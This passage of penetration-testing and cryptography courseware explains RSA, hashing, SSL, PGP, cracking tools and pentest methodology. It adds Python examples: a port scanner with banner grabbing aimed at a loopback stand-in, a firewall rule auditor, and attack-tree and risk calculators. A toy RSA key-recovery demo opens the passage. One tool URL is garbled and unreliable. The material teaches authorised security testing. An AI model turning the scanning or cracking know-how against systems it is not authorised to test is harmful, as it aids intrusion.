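           (unsigned long long)k.e, (unsigned long long)k.d);   /* 3233 17 2753 */
    printf("encrypt(123) = %llu\n", (unsigned long long)c);     /* 855 */
    printf("decrypt(%llu) = %llu\n", (unsigned long long)c,
           (unsigned long long)rsa_decrypt(&k, c));            /* 123 */
    printf("attacker recovers d = %llu from (n, e) alone\n",
           (unsigned long long)recover_d(k.n, k.e));            /* 2753 */
    return 0;
}
```

Everything the attacker needs is the public key; the only thing standing between (n, e) and d is the cost of factor_modul­us(), which grows with the size of n. That is the quantity the RSA Factoring Challenge later in the module is designed to measure.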
MD5

© The MD5 algorithm takes, as input, a message
of arbitrary length and outputs a 128-bit
fingerprint or message digest of the input.

© The MD5 algorithm is intended for digital
signature applications where a large file must
be compressed in a secure manner before being
encrypted with a private (secret) key under a
public-key cryptosystem, such as RSA.
SHA (Secure Hash Algorithm)

© The SHA algorithm takes, as input, a message
of arbitrary length and outputs a 160-bit
fingerprint or message digest of the input.

© The algorithm is slightly slower than MD5, but
the larger message digest makes it more secure
against brute-force collision and inversion
attacks.
SSL (Secure Sockets Layer)

© SSL stands for Secure Sockets Layer.
SSL is a protocol developed by
Netscape for transmitting private
documents via the Internet.

© SSL works by using public-key cryptography
during the handshake to agree on a session key,
and then encrypting the data transferred over the
SSL connection with that (symmetric) key.

© The SSL protocol is application protocol
independent.
© RC5 is a fast, symmetric block cipher designed by RSA
Security in 1994.

© It is a parameterized algorithm with a variable block
size, a variable key size, and a variable number of
rounds. The nominal version, RC5-32/12/16, uses a
128-bit key.

© RC6 is a block cipher based on RC5. Like RC5, RC6 is a
parameterized algorithm where the block size, the key
size, and the number of rounds are variable. The upper
limit on the key size is 2040 bits.
© The program SSH (Secure Shell) is a secure
replacement for telnet and the Berkeley r-utilities
(rlogin, rsh, rcp, and rdist).

© It provides an encrypted channel for logging into
another computer over a network, executing commands
on a remote computer, and moving files from one
computer to another.

© SSH provides strong host-to-host and user
authentication as well as secure encrypted
communications over an insecure Internet.

© SSH 2 is a more secure, efficient, and portable version of
SSH that includes SFTP, an SSH 2 tunneled FTP.
Government Access to Keys (GAK)

© Government Access to Keys (also known as key escrow)
means that software companies will give copies of all
keys (or at least enough of the key that the remainder
could be cracked very easily) to the government.

© The government promises that it would hold the keys
in a secure way and only use them to crack keys when a
court issues a warrant to do so.

© To the government, this issue is similar to the ability to
wiretap phones.
RSA Challenge

Challenge Number   Prize ($US)   Status         Submission Date   Submitter(s)
RSA-576            $10,000       Not Factored
RSA-640            $20,000       Not Factored
RSA-704            $30,000       Not Factored
RSA-768            $50,000       Not Factored
RSA-896            $75,000       Not Factored
RSA-1024           $100,000      Not Factored
RSA-1536           $150,000      Not Factored
RSA-2048           $200,000      Not Factored

The RSA Factoring Challenge is an effort, sponsored by RSA
Laboratories, to learn about the actual difficulty of factoring
large numbers of the type used in RSA keys. A set of eight
challenge numbers, ranging in size from 576 bits to 2048 bits,
is given.
www.distributed.net

© An attempt to crack RC5 encryption using a network of
computers worldwide.

© The client utility, when downloaded from
distributed.net, runs the cracking algorithm as a
screensaver and sends results to the distributed.net
connected servers.

© The challenge is still running.
PGP (Pretty Good Privacy)

© Pretty Good Privacy (PGP) is a software package
originally developed by Philip R. Zimmermann that
provides cryptographic routines for email and file
storage applications.

© Zimmermann took existing cryptosystems and
cryptographic protocols and developed a program that
can run on multiple platforms. It provides message
encryption, digital signatures, data compression, and
email compatibility.







Code Breaking: Methodologies

© The various methodologies used for code
breaking are as follows:

• Using brute force

• Frequency analysis

• Trickery and deceit

• One-time pad
Cryptography Attacks

© Cryptography attacks are based on the
assumption that the cryptanalyst knows the
algorithm in use and has access to some of the
encrypted traffic; the attack types differ in what
else he can obtain.

© Cryptography attacks are of seven types:

• Ciphertext-only attack

• Known-plaintext attack

• Chosen-plaintext attack

• Adaptive chosen-plaintext attack

• Chosen-ciphertext attack

• Chosen-key attack

• Rubber hose attack
Disk Encryption

© Disk encryption works similarly to text message
encryption.

© With the use of an encryption program for your
disk, you can safeguard any and all information
burned onto the disk and keep it from falling
into the wrong hands.

© Encryption for disks is incredibly useful if and
when you need to send sensitive information
through the mail.
Hacking Tool: PGP Crack

http://munitionsjgluxjb.neiydolphin.cgi?ad:ion=render
&category=0406

© PGP crack is a program designed to brute-force a
conventionally encrypted file with PGP or a PGP
secret key.

© The file pgpfile must not be ascii-armored. The file
phraselist should be a file containing all of the
passphrases that will be used to attempt to crack the
encrypted file.
Magic Lantern

© A new surveillance software that
would allow agents to decode the
hard-to-break encrypted data of
criminal suspects.

© Magic Lantern works by infecting
a suspect's computer with a virus
that installs keylogging software -
a program that can capture the
keystrokes typed into a computer.
WEPCrack

© WEPCrack is an open source tool for breaking
802.11 WEP secret keys.

© This tool is Perl-based, and is composed of the
following scripts:

• WeakIVGen.pl

• prism-getIV.pl

• WEPCrack.pl
Cracking S/MIME Encryption Using Idle
CPU Time

© It tries to brute-force an S/MIME encrypted
email message by translating an S/MIME
encrypted message to RC2 format, and then
trying all the possible keys to decrypt the
message.

© This brute-force utility comes in two forms:

• Command line

• Screen saver
CypherCalc

© It is a full-featured,
programmable calculator
designed for multi-precision
integer arithmetic.

© It is intended for use in the
design, testing, and analysis of
cryptographic algorithms
involving key exchanges,
modular exponentiation,
modular inverses, and
Montgomery math.

© It has built-in GCD and SHA-1
tools, and a CRC tool that can
generate CRC tables for your
applications.
Command Line Scriptor

© Automate file encryption/decryption, digital
signing, and verification.

© Send files and emails securely without any user
intervention.

© Ensure that all of the important data is secured
without relying on user input.

© Bulk delete files at a pre-defined date and time.

© Integrates cryptographic techniques into
existing applications.

© Processes incoming secure files from any
OpenPGP compliant application.
Screenshot of Command Line Scriptor
CryptoHeaven

© CryptoHeaven allows groups to send encrypted email,
securely back up and share files, pictures, charts,
business documents, and any other form of electronic
media through a secure environment.

© No third parties, including server administrators,
government agencies, big brothers, and others watching,
have access to the plain text version of the transmitted
information.

© Some of the features of the service include secure
document storage, secure document sharing and
distribution, secure message boards, secure email, and
secure instant messaging.
Summary

© Using Public Key Infrastructure (PKI), anyone can send a confidential
message using public information, which can only be decrypted with a
private key in the sole possession of the intended recipient.

© RSA encryption is widely used and is a de-facto encryption standard.

© The MD5 algorithm is intended for digital signature applications,
where a large file must be compressed securely before being
encrypted.

© The SHA algorithm takes, as input, a message of arbitrary length and
outputs a 160-bit message digest of the input.

© Secure Sockets Layer, SSL, is a protocol for transmitting private
documents via the Internet.

© RC5 is a fast block cipher designed by RSA Security.

© SSH (Secure Shell) is a secure replacement for telnet and the Berkeley
r-utilities, and provides an encrypted channel for logging into
another computer over a network, executing commands on a remote
computer, and moving files from one computer to another.
Introduction to PT

© Most hackers follow a common approach when it comes
to penetrating a system.

© In the context of penetration testing, the tester is
limited by resources, namely time, skilled resources,
and access to equipment, as outlined in the penetration
testing agreement.

© A pentest simulates methods used by intruders to gain
unauthorized access to an organization's networked
systems and then compromise them.
Categories of Security Assessments

© Every organization uses different types of security
assessments to validate the level of security on its
network resources.

© Security assessment categories are security audits,
vulnerability assessments, and penetration testing.

© Each type of security assessment requires that the
people conducting the assessment have different skills.
Vulnerability Assessment

© This assessment scans a network for known
security weaknesses.

© Vulnerability scanning tools search network
segments for IP-enabled devices and enumerate
systems, operating systems, and applications.

© Vulnerability scanners can test systems and
network devices for exposure to common
attacks.

© Additionally, vulnerability scanners can identify
common security configuration mistakes.
Limitations of Vulnerability
Assessment

© Vulnerability scanning software is limited in its
ability to detect vulnerabilities at a given point
in time.

© Vulnerability scanning software must be
updated when new vulnerabilities are
discovered or improvements are made to the
software being used.

© The methodology used as well as the diverse
vulnerability scanning software packages assess
security differently. This can influence the
result of the assessment.
Penetration Testing

© Penetration testing assesses the security model
of the organization as a whole.

© Penetration testing reveals potential
consequences of a real attacker breaking into
the network.

© A penetration tester is differentiated from an
attacker only by his intent and lack of malice.

© Penetration testing that is not completed
professionally can result in the loss of services
and disruption of business continuity.
Types of Penetration Testing

© External testing

• This type of testing involves analysis of publicly
available information, a network enumeration phase,
and analysis of the behavior of security devices.

© Internal testing

• Testing will typically be performed from a number of
network access points, representing each logical and
physical segment.

- Black hat testing/zero knowledge testing

- Gray hat testing/partial knowledge testing

- White hat testing/complete knowledge testing
Risk Management

© An unannounced test is usually associated with higher
risk and a greater potential of encountering unexpected
problems.

© Risk = Threat x Vulnerability

© A planned risk is any event that has the potential to
adversely affect the penetration test.

© The pentest team is advised to plan for significant risks
to enable contingency plans in order to effectively
utilize time and resources.
Do-it-Yourself Testing

© The degree to which the testing can be
automated is one of the major variables that
affect the skill level and time needed to run a
pentest.

© The degree of test automation, the extra cost of
acquiring a tool, and the time needed to gain
proficiency are factors that influence the test
period.
Outsourcing Penetration Testing
Services

© Drivers for outsourcing pentest services

• To get the network audited by an external agency to
acquire an intruder's point of view.

• The organization may require a specific security
assessment and suggested corrective measures.

© Underwriting penetration testing

• Professional liability insurance pays for settlements
or judgments for which pentesters become liable as a
result of their actions, or failure to perform
professional services.

• It is also known as E&O insurance or professional
indemnity insurance.
Terms of Engagement

© An organization will sanction a penetration test
against any of its production systems after it
agrees upon explicitly stated rules of
engagement.

© It must state the terms of reference under which
the agency can interact with the organization.

© It can specify the desired code of conduct, the
procedures to be followed, and the nature of
interaction between the testers and the
organization.
Project Scope

© Determining the scope of the pentest is
essential to decide if the test is a targeted test or
a comprehensive test.

© Comprehensive assessments are coordinated
efforts by the pentest agency to uncover as
many vulnerabilities as possible throughout the
organization.

© A targeted test will seek to identify
vulnerabilities in specific systems and practices.
Pentest Service Level Agreements

© A service level agreement is a contract that
details the terms of service that an outsourcer
will provide.

© Professionally done SLAs can include both
remedies and penalties.

© The bottom line is that SLAs define the
minimum levels of availability from the testers,
and determine what actions will be taken in the
event of serious disruption.
Testing Points

© Organizations have to reach a consensus on the extent of information that can be divulged to the testing team; this determines the starting point of the test.

© Providing a penetration testing team with additional information may give them an unrealistic advantage over a real attacker.

© Similarly, the extent to which vulnerabilities are to be exploited without disrupting critical services needs to be determined in advance.
Testing Locations

© The pentest team may have a preference to do the test remotely or on-site.

© A remote assessment may simulate an external hacker attack. However, it may miss assessing internal safeguards.

© An on-site assessment may be expensive and may not simulate an external threat exactly.
Automated Testing

© Automated testing can result in time and cost savings over the long term; however, tools cannot replace an experienced security professional.

© Tools can have a steep learning curve and may need frequent updating to remain effective.

© Automated testing leaves no scope for testing architectural elements: design-level weaknesses are not something a scanner can find.

© As with vulnerability scanners, there can be false positives or, worse, false negatives (real weaknesses the tool silently misses).
Manual Testing

© This is the best option an organization can choose, since it benefits from the experience of a security professional.

© The objective of the professional is to assess the security posture of the organization from a hacker's perspective.

© A manual approach requires planning, test design, scheduling, and diligent documentation to capture the results of the testing process in their entirety.
Using DNS Domain Name and IP Address Information

© Data from the DNS servers related to the target network can be used to map a target organization's network.

© DNS records (HINFO records, for example, or descriptive host names) can also reveal the OS or applications running on a server.

© The IP block of an organization can be discerned by looking up its domain name and the registration contact information for its personnel.
Enumerating Information About Hosts on Publicly Available Networks

© Enumeration can be done with port scanning tools that probe IP protocols and listen for responses on TCP/UDP ports.

© The testing team can then draw a detailed diagram of the network as it can be reached from the public Internet.

© Additionally, the effort can reveal screened subnets and yield a comprehensive list of the types of traffic that are allowed in and out of the network.

© Web site crawlers can mirror entire sites for offline analysis.
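
An added example (not from the courseware) of the enumeration step in its simplest form: a TCP connect() scan that records the banner each open port volunteers, plus a crude banner-to-service guess of the kind tools such as Nessus do far more thoroughly. To keep it runnable offline and within scope, the "target" is a constructed listener on 127.0.0.1 that answers with an invented SSH banner; `free_port()` supplies a port that is known to be closed. Scanning anything other than a host you are authorized to test is out of bounds, which is the point of the rules-of-engagement slides above.

```python
import socket
import threading
from contextlib import closing


def scan_ports(host, ports, timeout=0.5):
    """TCP connect() scan. Returns {open_port: banner_bytes} (banner may be empty)."""
    found = {}
    for port in ports:
        try:
            with closing(socket.create_connection((host, port), timeout=timeout)) as s:
                s.settimeout(timeout)
                try:
                    banner = s.recv(256)
                except socket.timeout:
                    banner = b""  # open, but the service waits for the client to speak first
                found[port] = banner.strip()
        except OSError:
            continue  # refused, filtered or timed out: treat as not open
    return found


def guess_service(banner):
    """Crude service identification from the first bytes a service sends."""
    if banner.startswith(b"SSH-"):
        return "ssh"
    if banner.startswith(b"HTTP/"):
        return "http"
    if banner[:4] in (b"220 ", b"220-"):
        return "smtp-or-ftp"
    return "unknown"


class FakeService:
    """Constructed stand-in for a live host: listens on 127.0.0.1 and sends a banner."""

    def __init__(self, banner=b"SSH-2.0-OpenSSH_3.4p1\r\n"):
        self.banner = banner
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
        self.sock.listen(5)
        self.sock.settimeout(0.2)  # so the accept loop can notice the stop flag
        self.port = self.sock.getsockname()[1]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(self.banner)
                except OSError:
                    pass

    def close(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()


def free_port():
    """A port that is not listening: bind to 0, read the number back, release it."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan one open and one closed loopback port; returns (open_port, closed_port, results)."""
    svc = FakeService()
    closed = free_port()
    try:
        results = scan_ports("127.0.0.1", [closed, svc.port])
    finally:
        svc.close()
    return svc.port, closed, results


if __name__ == "__main__":
    port, closed, results = demo()
    for p, banner in results.items():
        print(p, guess_service(banner), banner)
```

A real scan would also cover UDP (which needs ICMP unreachable handling rather than connect()), randomize order and rate-limit; the connect() scan is the noisiest but most reliable starting point and needs no privileges.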
Testing Network-Filtering Devices

© The objective of the pentest team is to ascertain that all legitimate traffic flows through the filtering device, and that nothing else does.

© Proxy servers may be subjected to stress tests to determine their ability to filter out unwanted packets under load.

© Testing for default installations of the firewall can be done to ensure that default user IDs and passwords have been disabled or changed.

© Testers can also check for any remote login capability that might have been enabled.
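
The first bullet is usually checked in two ways: by sending probe traffic through the device, and by reviewing the rule base itself. The added example below (written for this page, not taken from it) does the second for a constructed, first-match, default-deny rule base protecting a hypothetical DMZ web server at 203.0.113.10: it evaluates a list of "must flow / must not flow" packets against the rules and also reports shadowed rules, i.e. rules that can never fire because an earlier, broader rule already covers them. The rules, addresses and expectations are all invented for the demonstration.

```python
import ipaddress
from dataclasses import dataclass
from typing import NamedTuple


class Packet(NamedTuple):
    proto: str   # "tcp" or "udp"
    src: str
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str                 # "allow" or "deny"
    proto: str                  # "tcp", "udp" or "any"
    src: str                    # CIDR
    dst: str                    # CIDR
    dports: tuple = (1, 65535)  # inclusive (low, high)

    def matches(self, pkt):
        return ((self.proto == "any" or self.proto == pkt.proto)
                and ipaddress.ip_address(pkt.src) in ipaddress.ip_network(self.src)
                and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(self.dst)
                and self.dports[0] <= pkt.dport <= self.dports[1])

    def covers(self, other):
        """True if every packet matching `other` also matches this rule."""
        return ((self.proto == "any" or self.proto == other.proto)
                and ipaddress.ip_network(other.src).subnet_of(ipaddress.ip_network(self.src))
                and ipaddress.ip_network(other.dst).subnet_of(ipaddress.ip_network(self.dst))
                and self.dports[0] <= other.dports[0]
                and other.dports[1] <= self.dports[1])


def evaluate(rules, pkt, default="deny"):
    """First-match semantics with an implicit default deny, the usual firewall model."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return default


def audit(rules, cases):
    """cases: [(Packet, expected_action)]. Returns (packet, expected, actual) mismatches."""
    return [(pkt, expected, evaluate(rules, pkt))
            for pkt, expected in cases if evaluate(rules, pkt) != expected]


def shadowed_rules(rules):
    """(i, j) pairs where rule i can never fire because earlier rule j covers it."""
    out = []
    for i, r in enumerate(rules):
        for j, e in enumerate(rules[:i]):
            if e.covers(r):
                out.append((i, j))
                break
    return out


# Constructed rule base for a hypothetical DMZ web server 203.0.113.10.
RULES = [
    Rule("allow", "tcp", "0.0.0.0/0",  "203.0.113.10/32", (80, 80)),
    Rule("allow", "tcp", "0.0.0.0/0",  "203.0.113.10/32", (443, 443)),
    Rule("allow", "tcp", "10.0.0.0/8", "203.0.113.0/24"),             # management: any port
    Rule("deny",  "tcp", "0.0.0.0/0",  "203.0.113.0/24", (23, 23)),   # "no telnet"
    Rule("allow", "tcp", "10.0.0.0/8", "203.0.113.10/32", (22, 22)),  # already covered by rule 2
]

# Constructed expectations: what must flow, what must not.
CASES = [
    (Packet("tcp", "198.51.100.5", "203.0.113.10", 80),   "allow"),
    (Packet("tcp", "198.51.100.5", "203.0.113.10", 443),  "allow"),
    (Packet("tcp", "198.51.100.5", "203.0.113.10", 23),   "deny"),
    (Packet("tcp", "10.2.3.4",     "203.0.113.10", 22),   "allow"),
    (Packet("udp", "198.51.100.5", "203.0.113.10", 53),   "deny"),
    (Packet("tcp", "198.51.100.5", "203.0.113.10", 3389), "deny"),
]

if __name__ == "__main__":
    print("mismatches:", audit(RULES, CASES))
    print("shadowed:", shadowed_rules(RULES))
    print("telnet from management net:",
          evaluate(RULES, Packet("tcp", "10.9.9.9", "203.0.113.10", 23)))
```

The audit passes, yet the last line prints "allow": the "no telnet" rule sits below the any-port management rule, so it never applies to 10.0.0.0/8. Ordering mistakes of this kind are precisely what the probe traffic of a filtering-device test should be designed to surface, and why the expected-outcome list needs cases from every source zone, not only from the Internet.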
Enumerating Devices

© A device inventory is a collection of network devices, together with relevant information about each device, recorded in a document.

© After the network has been mapped and the business assets identified, the next logical step is to make an inventory of the devices.

© A physical check may additionally be conducted to ensure that the enumerated devices have been located correctly.
Denial of Service Emulation

© Emulating DoS attacks can be resource intensive.

© DoS attacks can be emulated using hardware traffic generators.

© Some online services simulate DoS attacks for a nominal charge.

© These tests are meant to check the effectiveness of anti-DoS devices.
Pentest Using AppScan

© AppScan is a tool developed for automated web application security testing and weakness assessment.
Hacker Shield

© HackerShield is an anti-hacking program that identifies and fixes the vulnerabilities that hackers exploit in servers, workstations, and other IP devices.

Sample report (scan of a single host):

HackerShield Scan Summary: 10.30.102.39

Report Name:               10.30.102.39      Report Date:     08-07-2000 13:38:24
No. of Hosts Scanned:      1                 Scan Started:    08-07-2000 13:38:24
No. of Groups Scanned:     1                 Scan Completed:  08-07-2000 13:40:53
Total Unreachable Devices: (not shown)       Elapsed Time:    00:02:29
AutoFix Enabled:           No

Security Holes Found:

              Found   Fixed
High Risk        4
Medium Risk     12
Low Risk        20
Total           36
Unique          36

(The Fixed column is empty because AutoFix was disabled for this scan.)
Pentest Using Cerberus Internet Scanner

© Cerberus Information Security used to maintain the Cerberus Internet Scanner (CIS), which is now available from @stake.

© It is programmed to assist administrators in finding and fixing vulnerabilities in their systems.
Pentest Using Cybercop Scanner

© Cybercop Scanner enables the user to identify vulnerabilities by conducting more than 830 vulnerability checks.

© It is efficient because it scans over 100 hosts at the same time and runs only the applicable tests on each network device.

© It is also useful to administrators for fixing problems and security holes.
Pentest Using Foundscan Hardware Appliances

© Foundscan tries to identify the operating system running on each live host by analyzing the returned data with a fingerprinting algorithm.
Pentest Using Nessus

© Nessus is a suitable utility for service detection, as its enhanced service-detection feature recognizes services by their behaviour rather than by port number alone.
Pentest Using NetRecon

© NetRecon is useful for defining common intrusion and attack scenarios to locate and report network holes.
Pentest Using SAINT

© SAINT probes every live system on a network for TCP and UDP services.

EC-Council
Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited

Pentest Using SecureNET

© SecureNET Pro is a fusion of many technologies, namely session monitoring, firewall, session hijacking, and keyword-based intrusion detection.
Pentest Using SecureScan

© SecureScan is a network vulnerability assessment tool that determines whether internal networks and firewalls are vulnerable to attack, and recommends corrective action for the vulnerabilities it identifies.
Pentest Using SATAN, SARA, and Security Analyzer

© Security Auditor's Research Assistant (SARA) is a third-generation Unix-based security analysis tool.

© SATAN is considered one of the pioneering tools that led to the development of vulnerability assessment tools.

© Security Analyzer helps in preventing attacks, protecting critical systems, and safeguarding information.
Pentest Using STAT Analyzer

© STAT Analyzer is a vulnerability assessment utility that integrates state-of-the-art commercial network modeling and scanning tools.
VigilEnt

© VigilEnt helps protect systems by assessing policy compliance and identifying security vulnerabilities, and helps correct exposures before they result in failed audits, security breaches, or costly downtime.
WebInspect

© WebInspect complements firewalls and intrusion detection systems by identifying web application security holes, defects, or bugs, each with a security suggestion.

Sample scan results (Sequence View, target http://endo.webappsecurity.com):

Severity | Count | Type          | Summary
---------|-------|---------------|----------------------------------------------------------
Critical | 2     | Vulnerability | Database Server Error Message
Critical | 1     | Vulnerability | IIS 5.0 Internet Printing Protocol ISAPI Buffer Overflow
Critical | 1     | Vulnerability | IIS Global Server Variables Disclosure (global.asa.bak)
Critical | 1     | Vulnerability | Backup File (cgi.zip)
Critical | 1     | Vulnerability | CVS Content Files

Alerts / System Log: Scan opened
Evaluating Different Types of Pentest Tools

© The different factors affecting the type of tool selected include:

• Cost

• Platform

• Ease of use

• Compatibility

• Reporting capabilities
Asset Audit

© Typically, an asset audit focuses on what needs to be protected in an organization.

© The audit enables organizations to specify what they have and how well these assets have been protected.

© The audit can help in assessing the risk posed by each threat to the business assets.
Fault Tree and Attack Trees

© Fault tree analysis is commonly used as a deductive, top-down method for evaluating a system's failure events.

© It involves specifying a root event to analyze, then identifying all the related events (second-tier events) that could have caused the root event to occur, and so on down the tree.

© An attack tree applies the same structure to an adversary: it provides a formal, methodical way of describing who, when, why, how, and with what probability an intruder might attack a system. Sub-goals are combined with AND nodes (every child step is needed) and OR nodes (any one child suffices).
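
An added example (written for this page, not part of the courseware) that makes the "with what probability" bullet concrete. It builds a small attack tree for a hypothetical goal, enumerates every leaf-level attack path, ranks the paths by estimated success probability, and computes the root probability (OR nodes combine as 1 - prod(1 - p), AND nodes as prod(p), treating leaves as independent) and the cheapest path. The tree, probabilities and costs are illustrative estimates chosen for the demonstration; in practice they come from the internal and external metrics discussed later in this module.

```python
from itertools import product
from math import prod


class Leaf:
    """An atomic attacker step with an estimated success probability and cost."""

    def __init__(self, name, p, cost):
        self.name, self.p, self.cost = name, p, cost

    def scenarios(self):
        return [((self.name,), self.p, self.cost)]


class OR:
    """Goal achieved if any one child is achieved."""

    def __init__(self, name, *children):
        self.name, self.children = name, children

    def scenarios(self):
        return [s for c in self.children for s in c.scenarios()]


class AND:
    """Goal achieved only if every child is achieved."""

    def __init__(self, name, *children):
        self.name, self.children = name, children

    def scenarios(self):
        out = []
        for combo in product(*(c.scenarios() for c in self.children)):
            steps = tuple(step for s in combo for step in s[0])
            p = prod(s[1] for s in combo)      # independent steps
            cost = sum(s[2] for s in combo)
            out.append((steps, p, cost))
        return out


def root_probability(node):
    """P(goal), leaves independent: OR = 1 - prod(1 - p_i), AND = prod(p_i)."""
    if isinstance(node, Leaf):
        return node.p
    ps = [root_probability(c) for c in node.children]
    return prod(ps) if isinstance(node, AND) else 1 - prod(1 - p for p in ps)


def cheapest_path(node):
    """Minimum attacker cost to reach the goal (AND sums, OR takes the minimum)."""
    if isinstance(node, Leaf):
        return node.cost
    costs = [cheapest_path(c) for c in node.children]
    return sum(costs) if isinstance(node, AND) else min(costs)


def ranked_scenarios(node):
    """All attack paths to the root goal, most likely first, cheaper first on ties."""
    return sorted(node.scenarios(), key=lambda s: (-s[1], s[2]))


# Constructed example tree; the numbers are illustrative estimates, not data.
TREE = OR("Read customer database",
          AND("Abuse remote access",
              Leaf("Phish an admin's VPN password", 0.3, 2),
              Leaf("VPN accepts password-only logins", 0.9, 0)),
          Leaf("SQL injection in the web application", 0.5, 5),
          AND("Steal backup media",
              Leaf("Gain physical access to the data centre", 0.05, 50),
              Leaf("Backup tapes unencrypted", 0.8, 1)))

if __name__ == "__main__":
    for steps, p, cost in ranked_scenarios(TREE):
        print(f"p={p:.3f} cost={cost:>3}  " + " AND ".join(steps))
    print("P(root) =", round(root_probability(TREE), 4), " cheapest =", cheapest_path(TREE))
```

The ranking is what the later "relative criticality" step consumes: each path's probability is bucketed into high/medium/low and combined with the business impact of the root goal.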
GAP Analysis

© A GAP analysis is used to determine how complete a system's security measures are.

© The purpose of a GAP analysis is to evaluate the gaps between an organization's vision (where it wants to be) and its current position (where it is).

© In the area of security testing, the analysis is typically accomplished by establishing the extent to which the system meets the requirements of a specific internal or external standard (or checklist).
© Once a device inventory has been compiled, the next step in this process is to list the different security threats.

© The pentest team can list the different security threats that each hardware device and software component might face.

© The possible threats can be determined by identifying the specific exploits that could cause such threats to occur.
Business Impact of Threat

© After a device inventory has been compiled, the next step is to list the various security threats that each hardware device and software component faces.

© The pentesters need to rate each exploit, and the threat arising out of the exploit, to assess the business impact.

© A relative severity can then be assigned to each threat.
Internal Metrics Threat

© Internal metrics are the information available within the organization that can be used for assessing the risk.

© The metrics may be arrived at differently by different pentest teams, depending on the method followed and their experience with the organization.

© Sometimes this may be a time-consuming effort, or the data may be insufficient to be statistically valid.
External Metrics Threat

© External metrics can be derived from data collected outside the organization.

© These can be survey reports such as the FBI/CSI yearly security threat report, reports from agencies like CERT, or hacker activity reports from reputed security firms like Symantec.

© This must be done prior to the test.
Calculating Relative Criticality

© Once high, medium, and low values have been assigned both to the probability of an exploit being successful and to the impact on the business should the event occur, it becomes possible to combine these values into a single assessment of the criticality of the potential vulnerability.
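
An added example (not from the courseware) of that combination carried through for a whole threat register: an estimated success probability is bucketed into high/medium/low, multiplied against the impact rating on a 1..3 scale, labelled, and the register is sorted most-critical-first with a per-asset roll-up. The thresholds, the 3x3 matrix and the sample register are all constructed for the demonstration; an organization substitutes its own.

```python
LEVEL = {"low": 1, "medium": 2, "high": 3}


def likelihood_bucket(p):
    """Map an estimated probability of successful exploitation to H/M/L (constructed thresholds)."""
    return "high" if p >= 0.5 else "medium" if p >= 0.2 else "low"


def criticality(likelihood, impact):
    """Combine the two ratings into one: score = likelihood x impact on a 1..3 scale.

    Score 9 or 6 -> high, 4 or 3 -> medium, 2 or 1 -> low; so a high-impact threat
    with a medium chance of success outranks a near-certain low-impact one.
    """
    score = LEVEL[likelihood] * LEVEL[impact]
    label = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return score, label


def rank_threats(threats):
    """threats: [(asset, threat, probability, impact)] -> register rows, most critical first."""
    rows = []
    for asset, name, p, impact in threats:
        lk = likelihood_bucket(p)
        score, label = criticality(lk, impact)
        rows.append({"asset": asset, "threat": name, "likelihood": lk,
                     "impact": impact, "score": score, "criticality": label})
    return sorted(rows, key=lambda r: (-r["score"], r["asset"], r["threat"]))


def asset_criticality(register):
    """Roll-up: an asset is as critical as the worst threat it faces."""
    worst = {}
    for r in register:
        if r["score"] > worst.get(r["asset"], (0, ""))[0]:
            worst[r["asset"]] = (r["score"], r["criticality"])
    return worst


# Constructed register: hypothetical assets and threats, illustrative numbers.
THREATS = [
    ("web01",  "SQL injection in order form", 0.5,  "high"),
    ("web01",  "Directory listing enabled",    0.9,  "low"),
    ("vpn",    "Password-only authentication", 0.3,  "high"),
    ("backup", "Unencrypted off-site tapes",   0.05, "high"),
    ("fw",     "Telnet management enabled",    0.2,  "medium"),
]

if __name__ == "__main__":
    for r in rank_threats(THREATS):
        print(f'{r["score"]} {r["criticality"]:<6} {r["asset"]:<7} {r["threat"]}')
    print(asset_criticality(rank_threats(THREATS)))
```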
Test Dependencies

© From the management perspective, the dependencies are approvals, agreement on the rules of engagement, signing a non-disclosure contract, and ascertaining the compensation terms.

© Post-testing dependencies include proper documentation, preserving logs, and recording screen captures.



© Bug Tracker Server

• Web-based bug/defect tracking software.

- By Avensoft.com.

- Bug Tracker Server is web-based bug/defect tracking software used by product developers and manufacturers to manage product defects.

• SWB Tracker

- By softwarewithbrains.com.

- SWB Tracker supports multi-user platforms with concurrent licensing.

• Advanced Defect Tracking Web Edition

- By http://www.borderwave.com.

- The software allows one to track bugs, defects, feature requests, and suggestions by version or customer.
Disk Replication Tools

© SnapBack DUP

• By http://www.hallogram.com.

• This utility is programmed to create an exact image backup of a server or workstation hard drive.

© Daffodil Replicator

• By http://www.daffodildb.com.

• Daffodil Replicator is a tool that enables the user to synchronize multiple data sources using a Java application.

© Image MASSter 40021

• By http://www.ics-iq.com.

• This tool helps the user work out a solution for setting up workstations and operating system roll-out methods.
DNS Zone Transfer Testing Tools

© DNS Analyzer

• http://www.solarwinds.net/Tools/IP_Address_Management/DNS%20Analyzer/index.html

• The DNS Analyzer application is used to display the order of the DNS resource records.

© Spam Blacklist

• http://www.solarwinds.net/Tools/Email Mgmt

• DNS blacklists are a popular tool used by email administrators to help block reception of spam into their mail systems.
Network Auditing Tools

© eTrust Audit (audit log repository)

• By http://ca.com.

• It does not reduce system performance, and avoids the load of network traffic that other auditing products generate.

© iInventory

• By http://www.iinventory.com.

• The iInventory program enables the user to audit a Windows, Mac, or Linux operating system for its detailed hardware and software configuration.

© Centennial Discovery

• This Discovery program has unique LAN Probe software, which is able to locate every IP device connected to the network.
Trace Route Tools and Services

© Trellian Trace Route

• By www.tucows.com.

• The trace route application allows the website administrator to see how many servers traffic to his website passes through before it reaches the computer, informing the administrator of any problem-causing servers, and even giving a ping time for each server in the path.

© Ip Tracer 13

• By www.soft32.com.

• Ip Tracer is an application made for tracking down spammers.
© Sniff'em

• By http://www.sniff-em.com/.

• Sniff'em is a competitively priced, performance-minded Windows-based packet sniffer, network analyzer, and network sniffer, a network management tool designed from the ground up with ease of use and functionality in mind.

© PromiScan

• By www.shareup.com.

• PromiScan offers better monitoring capabilities by providing a nonstop watch that detects promiscuous-mode (sniffing) programs starting and stopping, without increasing the network load.
